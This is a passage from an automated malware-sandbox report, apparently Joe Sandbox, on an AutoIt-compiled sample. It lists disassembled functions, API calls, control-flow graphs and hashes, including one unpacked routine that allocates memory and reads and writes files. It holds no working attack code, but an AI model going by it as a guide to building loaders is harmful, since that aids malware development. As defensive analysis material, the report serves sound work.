                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1973 40f679-40f67c 1969->1973 1972 40f640 1970->1972 1974 40f642-40f650 1972->1974 1973->1963 1975 40f652-40f655 1974->1975 1976 40f67e-40f68c 1974->1976 1979 40f65b-40f65e 1975->1979 1980 425d1e-425d3e call 4150d1 call 414d04 1975->1980 1977 40f68e-40f68f 1976->1977 1978 40f69f-40f6ad 1976->1978 1977->1975 1982 40f6b4-40f6c2 1978->1982 1983 40f6af-40f6b2 1978->1983 1979->1969 1979->1972 1990 425d43-425d5f call 414d30 1980->1990 1985 425d16 1982->1985 1986 40f6c8-40f6d6 1982->1986 1983->1975 1985->1980 1988 425d05-425d0b 1986->1988 1989 40f6dc-40f6df 1986->1989 1988->1974 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1985
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AU3!$EA06
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1268643489-2658333250
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1997 401144-40114a 1995->1997 1998 40111b-40111e 1995->1998 1996->1995 1999 401182 1996->1999 2001 401184-40118e call 401250 1997->2001 2002 40114c-40114f 1997->2002 1998->1997 2000 401120-401126 1998->2000 2003 40112c-401141 DefWindowProcW 1999->2003 2000->2003 2004 42b038-42b03f 2000->2004 2013 401193-40119a 2001->2013 2005 401151-401157 2002->2005 2006 40119d 2002->2006 2004->2003 2012 42b045-42b059 call 401000 call 40e0c0 2004->2012 2010 401219-40121f 2005->2010 2011 40115d 2005->2011 2008 4011a3-4011a9 2006->2008 2009 42afb4-42afc5 call 40f190 2006->2009 2008->2000 2014 4011af 2008->2014 2009->2013 2010->2000 2017 401225-42b06d call 468b0e 2010->2017 2015 401163-401166 2011->2015 2016 42b01d-42b024 2011->2016 2012->2003 2014->2000 2020 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2014->2020 2021 4011db-401202 SetTimer RegisterWindowMessageW 2014->2021 2023 42afe9-42b018 call 40f190 call 401a50 2015->2023 2024 40116c-401172 2015->2024 2016->2003 2022 42b02a-42b033 call 4370f4 2016->2022 2017->2013 2021->2013 2031 401204-401216 CreatePopupMenu 2021->2031 2022->2003 2023->2003 2024->2000 2033 401174-42afde call 45fd57 2024->2033 2033->2003 2045 42afe4 2033->2045 2045->2013
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                                                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                                                                                                                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ,*H$4*H$@fI
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 615853336-1459471987
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 049386E8 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 2065 49386e8-493873a call 49385e8 CreateFileW 2068 4938743-4938750 2065->2068 2069 493873c-493873e 2065->2069 2072 4938763-493877a VirtualAlloc 2068->2072 2073 4938752-493875e 2068->2073 2070 493889c-49388a0 2069->2070 2074 4938783-49387a9 CreateFileW 2072->2074 2075 493877c-493877e 2072->2075 2073->2070 2077 49387ab-49387c8 2074->2077 2078 49387cd-49387e7 ReadFile 2074->2078 2075->2070 2077->2070 2079 493880b-493880f 2078->2079 2080 49387e9-4938806 2078->2080 2081 4938811-493882e 2079->2081 2082 4938830-4938847 WriteFile 2079->2082 2080->2070 2081->2070 2085 4938872-4938897 CloseHandle VirtualFree 2082->2085 2086 4938849-4938870 2082->2086 2085->2070 2086->2070
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0493872D
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: db087c0302d8ffa699348145200ad59923ea17d1522a3167b85c8a602d572f01
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB512975A50208FBEF20EFA0CC49FDE77B9AF49741F108954F61AEB180DA74A6409B60
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 2095 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2098 427190-4271ae RegQueryValueExW 2095->2098 2099 40e4eb-40e4f0 2095->2099 2100 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2098->2100 2101 42721a-42722a RegCloseKey 2098->2101 2106 427210-427219 call 436508 2100->2106 2107 4271f7-42720e call 402160 2100->2107 2106->2101 2107->2106
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1586453840-614718249
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 2112 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 2113 401b80-401b96 2114 401b9c-401bb3 call 4013c0 2113->2114 2115 401c7e-401c84 2113->2115 2118 42722b-42723b LoadStringW 2114->2118 2119 401bb9-401bd4 call 402160 2114->2119 2121 427246-427253 call 40e0a0 2118->2121 2124 427258-427275 call 40d200 call 4348de 2119->2124 2125 401bda-401bde 2119->2125 2129 401bf3-401c79 call 412f40 call 412fba call 411567 Shell_NotifyIconW call 402250 2121->2129 2124->2129 2137 42727b-42728f call 40d200 call 4348de 2124->2137 2125->2121 2127 401be4-401bee call 40d200 2125->2127 2127->2129 2129->2115
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Line:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1874344091-1585850449
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
